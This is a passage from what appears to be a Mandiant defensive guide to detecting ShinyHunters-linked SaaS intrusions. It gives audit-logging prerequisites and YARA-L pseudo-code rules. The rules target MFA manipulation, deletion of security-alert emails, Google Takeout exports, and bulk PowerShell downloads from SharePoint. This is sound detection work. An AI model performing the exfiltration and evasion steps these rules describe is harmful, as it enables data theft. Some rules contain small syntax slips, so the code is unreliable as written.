<p role="presentation"><span style="vertical-align: baseline;">You need tenant-level admin permissions to access and configure audit/event logging.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Confirm your plan/subscriptions include the audit/event visibility you are trying to collect (Atlassian org audit log capabilities can depend on plan/Guard tier; DocuSign org-level activity monitoring is provided via DocuSign Monitor).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">API access (If you are pulling logs programmatically): Ensure the tenant is able to use the vendor’s audit/event APIs (DocuSign Monitor API; Atlassian org audit log API/webhooks depending on capability).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Retention reality check: Validate the platform’s native audit-log retention window meets your investigation needs.</span></p> </li> </ul> <h5><span style="vertical-align: baseline;">What to Enable and Ingest into the SIEM</span></h5> <p><strong style="vertical-align: baseline;">DocuSign (audit/monitoring logs)</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Authentication events (successful/failed sign-ins, SSO vs password login if available)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://support.docusign.com/s/document-item?language=es&amp;bundleId=pqz1702943441912&amp;topicId=concb8f3294-71f0-478b-a228-dcc29dfd433a.html&amp;_LANG=esxm" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Administrative changes</span></a><span style="vertical-align: baseline;"> (user/role changes, org-level setting changes)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://support.docusign.com/s/document-item?language=en_US&amp;rsc_301&amp;bundleId=oeq1643226594604&amp;topicId=hha1578456343641.html&amp;_LANG=enus" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Envelope access</span></a><span style="vertical-align: baseline;"> and bulk activity (envelope viewed/downloaded, document downloaded, bulk send, bulk download/export where available)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">API activity (API calls, integration keys/apps used, client/app identifiers)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Source context (source IP/geo, user agent/client type)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Atlassian (Jira/Confluence audit logs)</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://support.atlassian.com/security-and-access-policies/docs/audit-log-activities-database/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Authentication events</span></a><span style="vertical-align: baseline;"> (SSO sign-ins, failed logins)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Privilege and admin changes (role/group membership changes, org admin actions)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Confluence/Jira data access at scale:</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Confluence: space/page view/download/export events (especially exports)</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Jira: project access, issue export, bulk actions (where available)</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">API token and app activity (API token created/revoked, OAuth app connected, marketplace app install/uninstall)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Source context (source IP/geolocation, user agent/client type)</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Microsoft 365 Audit Logging </span></h4> <p><span style="vertical-align: baseline;">Mandiant has observed threat actors leveraging PowerShell to download sensitive data from SharePoint and OneDrive as part of this campaign. To detect the activity, it is necessary to ingest </span><a href="https://learn.microsoft.com/en-us/purview/audit-log-activities" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">M365 audit telemetry</span></a><span style="vertical-align: baseline;"> that records file download operations along with client context (especially the user agent).</span></p> <h5><span style="vertical-align: baseline;">What You Need in Place Before Logging</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Microsoft Purview Audit is available and enabled: Your tenant must have Microsoft Purview Audit turned on and usable (Audit “Standard” vs “Premium” affects capabilities/retention).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Correct permissions to view/search audit: Assign the compliance/audit roles required to access audit search and records.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SharePoint/OneDrive operations are present in the Unified Audit Log: Validate that SharePoint/OneDrive file operations are being recorded (this is where operations like file download/access show up).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Client context is captured: Confirm audit records include UserAgent (when provided by the client) so you can identify PowerShell-based access patterns in SharePoint/OneDrive activity.</span></p> </li> </ul> <h5><span style="vertical-align: baseline;">What to Enable and Ingest into the SIEM</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">FileDownloaded</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">FileAccessed</code><span style="vertical-align: baseline;"> (</span><a href="https://learn.microsoft.com/en-us/office/office-365-management-api/office-365-management-activity-api-schema" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">SharePoint/OneDrive</span></a><span style="vertical-align: baseline;">)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">User agent/client identifier (to surface WindowsPowerShell-style user agents)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">User identity, source IP, geolocation</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Target resource details</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">3. Detections</span></h3> <p><span style="vertical-align: baseline;">The following detections target behavioral patterns Mandiant has identified in ShinyHunters related intrusions. In these scenarios, attackers typically gain initial access by compromising SSO platforms or manipulating MFA controls, then leverage native SaaS capabilities to exfiltrate data and evade detection.The following use cases are categorized by area of focus, including Identity Providers and Productivity Platforms. </span></p> <p><strong style="vertical-align: baseline;">Note: </strong><span style="vertical-align: baseline;">This activity is not the result of a security vulnerability in vendors' products or infrastructure. Instead, these intrusions rely on the effectiveness of ShinyHunters related intrusions.</span></p> <h4><span style="vertical-align: baseline;">Implementation Guidelines</span></h4> <p><span style="vertical-align: baseline;">These rules are presented as YARA-L pseudo-code to prioritize clear detection logic and cross-platform portability. Because field names, event types, and attribute paths vary across environments, consider the following variables:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Ingestion Source:</strong><span style="vertical-align: baseline;"> Differences in how logs are ingested into Google SecOps.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Parser Mapping:</strong><span style="vertical-align: baseline;"> Specific UDM (Unified Data Model) mappings unique to your configuration.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Telemetry Availability:</strong><span style="vertical-align: baseline;"> Variations in logging levels based on your specific SaaS licensing.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Reference Lists: </strong><span style="vertical-align: baseline;">Curated allowlists/blocklists the organization will need to create to help reduce noise and keep alerts actionable.</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Note: </strong><span style="vertical-align: baseline;">Mandiant recommends testing these detections prior to deployment by validating the exact event mappings in your environment and updating the pseudo-fields to match your specific telemetry.</span></p> <h4><span style="vertical-align: baseline;">Okta</span></h4> <h5><span style="vertical-align: baseline;">MFA Device Enrollment or Changes (Post-Vishing Signal)</span></h5> <p><span style="vertical-align: baseline;">Detects MFA device enrollment and MFA life cycle changes that often occur immediately after a social-engineered account takeover. When this alert is triggered, immediately review the affected user’s downstream access across SaaS applications (Salesforce, Google Workspace, Atlassian, DocuSign, etc.) for signs of large-scale access or data exports.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> In this intrusion pattern, MFA manipulation is a primary “account takeover” step. Because MFA lifecycle events are rare compared to routine logins, any modification occurring shortly after access is gained serves as a high-fidelity indicator of potential compromise.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Okta system Log MFA lifecycle events (enroll/activate/deactivate/reset)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">principal.user</code><span style="vertical-align: baseline;">, </span><code style="vertical-align: baseline;">principal.ip</code><span style="vertical-align: baseline;">, </span><code style="vertical-align: baseline;">client.user_agent</code><span style="vertical-align: baseline;">, geolocation/ASN (if enriched)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Optional: proximity to password reset, recovery, or sign-in anomalies (same user, short window)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $mfa.metadata.vendor_name = "Okta" $mfa.metadata.product_event_type in ( "okta.user.mfa.factor.enroll", "okta.user.mfa.factor.activate", "okta.user.mfa.factor.deactivate", "okta.user.mfa.factor.reset_all" ) $u= $mfa.principal.user.userid $t_mfa = $mfa.metadata.event_timestamp $ip = coalesce($mfa.principal.ip, $mfa.principal.asset.ip) $ua = coalesce($mfa.network.http.user_agent, $mfa.extracted.fields["userAgent"], "") $reset.metadata.vendor_name = "Okta" $reset.metadata.product_event_type in ( "okta.user.password.reset", "okta.user.account.recovery.start" ) $t_reset = $reset.metadata.event_timestamp $auth.metadata.vendor_name = "Okta" $auth.metadata.product_event_type in ("okta.user.authentication.sso", "okta.user.session.start") $t_auth = $auth.metadata.event_timestamp match: $u over 30m condition: // Always alert on MFA lifecycle change $mfa and // Optional sequence tightening (enrichment only, not mandatory): // If reset/auth exists in the window, enforce it happened before the MFA change. ( (not $reset and not $auth) or (($reset and $t_reset &lt; $t_mfa) or ($auth and $t_auth &lt; $t_mfa)) )</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Suspicious admin.security Actions from Anonymized IPs</span></h5> <p><span style="vertical-align: baseline;">Alert on Okta admin/security posture changes when the admin action occurs from suspicious network context (proxy/VPN-like indicators) or immediately after an unusual auth sequence.</span></p> <p><span style="vertical-align: baseline;">Why this is high-fidelity: Admin/security control changes are low volume and can directly enable persistence or reduce visibility.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Okta admin/system events (e.g., policy changes, MFA policy, session policy, admin app access)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">“Anonymized” network signal: VPN/proxy ASN, “datacenter” reputation, TOR list, etc.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Actor uses unusual client/IP for admin activity</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Reference lists</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">VPN_TOR_ASNS</code><span style="vertical-align: baseline;"> (proxy/VPN ASN list)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $a.metadata.vendor_name = "Okta" $a.metadata.product_event_type in ("okta.system.policy.update","okta.system.security.change","okta.user.session.clear","okta.user.password.reset","okta.user.mfa.reset_all") userid=$a.principal.user.userid // correlate with a recent successful login for the same actor if available $l.metadata.vendor_name = "Okta" $l.metadata.product_event_type = "okta.user.authentication.sso" userid=$l.principal.user.userid match: userid over 2h condition: $a and $l</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Google Workspace</span></h4> <h5><span style="vertical-align: baseline;">OAuth Authorization for ToogleBox Recall</span></h5> <p><span style="vertical-align: baseline;">Detects OAuth/app authorization events for ToogleBox recall (or the known app identifier), indicating mailbox manipulation activity.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> This is a tool-specific signal tied to the observed “delete security notification emails” behavior.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Workspace OAuth / token authorization log event</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">App name, app ID, scopes granted, granting user, source IP/geo</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Optional: privileged user context (e.g., admin, exec assistant)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.vendor_name = "Google Workspace" $e.metadata.product_event_type in ("gws.oauth.grant", "gws.token.authorize") // placeholders // match app name OR app id if you have it (lower($e.target.application) contains "tooglebox" or lower($e.target.application) contains "recall") condition: $e</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Gmail Deletion of Okta Security Notification Email</span></h5> <p><span style="vertical-align: baseline;">Detects deletion actions targeting Okta security notification emails (e.g., “Security method enrolled”).</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> Targeted deletion of security notifications is intentional evasion, not normal email behavior.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Gmail audit log delete/permanent delete (or mailbox cleanup) event</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Subject matches a small set of security-notification strings</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Time correlation: deletion shortly after receipt (optional)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $d.metadata.vendor_name = "Google Workspace" $d.metadata.product_event_type in ("gws.gmail.message.delete", "gws.gmail.message.trash", "gws.gmail.message.permanent_delete") // PLACEHOLDER regex_match(lower($d.target.email.subject), "(security method enrolled|new sign-in|new device|mfa|authentication|verification)") $u = $d.principal.user.userid $t = $d.metadata.event_timestamp match: $u over 30m condition: $d and count($d) &gt;= 2 // tighten: at least 2 in 30m; adjust if too strict }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Google Takeout Export Initiated/Completed</span></h5> <p><span style="vertical-align: baseline;">Detects Google Takeout export initiation/completion events.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> Takeout exports are uncommon in corporate contexts; in this campaign they represent a direct data export path.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Takeout audit events (e.g., initiated, completed)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">User, source IP/geo, volume</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Reference lists</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">TAKEOUT_ALLOWED_USERS</code><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">(rare; HR offboarding workflows, legal export workflows)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $start.metadata.vendor_name = "Google Workspace" $start.metadata.product_event_type = "gws.takeout.export.start" $user = $start.principal.user.userid $job = $start.target.resource.id // if available; otherwise remove job join $done.metadata.vendor_name = "Google Workspace" $done.metadata.product_event_type = "gws.takeout.export.complete" $bytes = coalesce($done.target.file.size, $done.extensions.bytes_exported) match: // takeout can take hours; don't use 10m here, adjust accordingly $start.principal.user.userid = $done.principal.user.userid over 24h // if you have a job/export id, this makes it *much* cleaner $start.target.resource.id = $done.target.resource.id condition: $start and $done and $start.metadata.event_timestamp &lt; $done.metadata.event_timestamp and $bytes &gt;= 500000000 // 500MB start point; tune not ($u in %TAKEOUT_ALLOWED_USERS) // OPTIONAL: remove if you don't maintain it</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Cross-SaaS</span></h4> <h5><span style="vertical-align: baseline;">Attempted Logins from Known Campaign Proxy/IOC Networks</span></h5> <p><span style="vertical-align: baseline;">Detects authentication attempts across SaaS/SSO providers originating from IPs/ASNs associated with the campaign.</span></p> <p><span style="vertical-align: baseline;">Why this is high-fidelity: These IPs and ASNs lack legitimate business overlap; matches indicate direct interaction between compromised credentials and known adversary-controlled infrastructure.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Authentication attempts across Okta / Salesforce / Workspace / Atlassian / DocuSign</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">principal.ip</code><span style="vertical-align: baseline;"> matches IOC IPs or ASN list</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Reference lists</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">SHINYHUNTERS_PROXY_IPS</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">VPN_TOR_ASNS</code></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.product_event_type in ( "okta.login.attempt", "workday.sso.login.attempt", "gws.login.attempt", "salesforce.login.attempt", "atlassian.login.attempt", "docusign.login.attempt" ) ( $e.principal.ip in %SHINYHUNTERS_PROXY_IPS or $e.principal.ip.asn in %VPN_TOR_ASNS ) condition: $e</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Identity Activity Outside Normal Business Hours</span></h5> <p><span style="vertical-align: baseline;">Detects identity events occurring outside normal business hours, focusing on high-risk actions (sign-ins, password reset, new MFA enrollment and/or device changes).</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> A strong indication of abnormal user behavior when also constrained to sensitive actions and users who rarely perform them.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">User sign-ins, password resets, MFA enrollment, device registrations</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Timestamp bucket: late evening / friday afternoon / weekends</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.vendor_name = "Okta" $e.metadata.product_event_type in ("okta.user.password.reset","okta.user.mfa.factor.activate","okta.user.mfa.factor.reset_all") // PLACEHOLDER outside_business_hours($e.metadata.event_timestamp, "America/New_York") // Include the business hours your organization functions in $u = $e.principal.user.userid condition: $e</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Successful Sign-in From New Location and New MFA Method</span></h5> <p><span style="vertical-align: baseline;">Detects a successful login that is simultaneously from a new geolocation and uses a newly registered MFA method.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> This pattern represents a compound condition that aligns with MFA manipulation and unfamiliar access context.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Successful authentication</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">New geolocation compared to user baseline</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">New factor method compared to user baseline (or recent MFA enrollment)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Optional sequence: MFA enrollment occurs after login</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $login.metadata.vendor_name = "Okta" $login.metadata.product_event_type = "okta.login.success" $u = $login.principal.user.userid $geo = $login.principal.location.country $t_l = $login.metadata.event_timestamp $m = $login.security_result.auth_method // if present; otherwise join to factor event condition: $login and first_seen_country_for_user($u, $geo) and first_seen_factor_for_user($u, $m)</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Multiple MFA Enrollments Across Different Users From the Same Source IP</span></h5> <p><span style="vertical-align: baseline;">Detects the same source IP enrolling/changing MFA for multiple users in a short window.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;">This pattern mirrors a known social engineering tactic where threat actors manipulate help desk admins to enroll unauthorized devices into a victim’s MFA - spanning multiple users from the same source address</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Okta MFA lifecycle events</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Same </span><code style="vertical-align: baseline;">src_ip</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Distinct user count threshold</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Tight window</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $m.metadata.vendor_name = "Okta" $m.metadata.product_event_type in ("&lt;OKTA_MFA_ENROLL_EVENT&gt;", "&lt;OKTA_MFA_DEVICE_ENROLL_EVENT&gt;") $ip = coalesce($m.principal.ip, $m.principal.asset.ip) $uid = $m.principal.user.userid match: $ip over 10m condition: count_distinct($uid) &gt;= 3</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Network</span></h4> <h5><span style="vertical-align: baseline;">Web/DNS Access to Credential Harvesting, Portal Impersonation Domains</span></h5> <p><span style="vertical-align: baseline;">Detects DNS queries or HTTP referrers matching brand and SSO/login keyword lookalike patterns.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> Captures credential-harvesting infrastructure patterns when you have network telemetry.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">DNS question name or HTTP referrer/URL</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Regex match for brand + SSO keywords</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Exclusions for your legitimate domains</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Reference lists</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Allowlist (small) of legitimate domains (optional)</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $event.metadata.event_type in ("NETWORK_HTTP", "NETWORK_DNS") // pick ONE depending on which log source you're using most // DNS: $domain = lower($event.network.dns.questions.name) // If you’re using HTTP instead, swap the line above to: // $domain = lower($event.network.http.referring_url) condition: regex_match($domain, ".*(yourcompany(my|sso|internal|okta|access|azure|zendesk|support)|(my|sso|internal|okta|access|azure|zendesk|support)yourcompany).*" ) and not regex_match($domain, ".*yourcompany\\.com.*") and not regex_match($domain, ".*okta\\.yourcompany\\.com.*")</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Microsoft 365</span></h4> <h5><span style="vertical-align: baseline;">M365 SharePoint/OneDrive: FileDownloaded with WindowsPowerShell User Agent</span></h5> <p><span style="vertical-align: baseline;">Detects SharePoint/OneDrive downloads with PowerShell user-agent that exceed a byte threshold or count threshold within a short window.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> PowerShell-driven SharePoint downloading and burst volume indicates scripted retrieval.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">FileDownloaded/FileAccessed</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">User agent contains PowerShell</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Bytes transferred OR number of downloads in window</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Timestamp window (ordering implicit) and min&lt;max check</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.vendor_name = "Microsoft" ( $e.target.application = "SharePoint" or $e.target.application = "OneDrive" ) $e.metadata.product_event_type = /FileDownloaded|FileAccessed/ $e.network.http.user_agent = /PowerShell/ nocase $user = $e.principal.user.userid $bytes = coalesce($e.target.file.size, $e.extensions.bytes_transferred) $ts = $e.metadata.event_timestamp match: $user over 15m condition: // keep your PowerShell constraint AND require volume $e and (sum($bytes) &gt;= 500000000 or count($e) &gt;= 20) and min($ts) &lt; max($ts)</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">M365 SharePoint: High Volume Document FileAccessed Events</span></h5> <p><span style="vertical-align: baseline;">Detects SharePoint document file access events that exceed a count threshold and minimum unique file types within a short window.</span></p> <p><strong style="vertical-align: baseline;">Why this is high-fidelity:</strong><span style="vertical-align: baseline;"> Burst volume may indicate scripted retrieval or usage of the Open-in-App feature within SharePoint.</span></p> <p><strong style="vertical-align: baseline;">Key signals</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">FileAccessed</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Filtering on common document file types (e.g., PDF) </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Number of downloads in window</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Minimum unique file types</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Pseudo-code (YARA-L)</strong></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>events: $e.metadata.vendor_name = "Microsoft" $e.metadata.product_event_type = "FileAccessed" $e.target.application = "SharePoint" $e.target.file.full_path = /\.(doc[mx]?|xls[bmx]?|ppt[amx]?|pdf)$/ nocase) $file_extension_extract = re.capture($e.target.file.full_path, `\.([^\.]+)$`) $session_id = $e.network.session_id match: $session_id over 5m outcome: $target_url_count = count_distinct(strings.coalesce($e.target.file.full_path)) $extension_count = count_distinct($file_extension_extract) condition: $e and $target_url_count &gt;= 50 and $extension_count &gt;= 3</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">M365 SharePoint: High Volume Document FileDownloaded Events</span></h5> <p><span style="vertical-align: baseline;">Detects SharePoint document file downloaded events that exceed a count threshold and minimum unique file types within a short 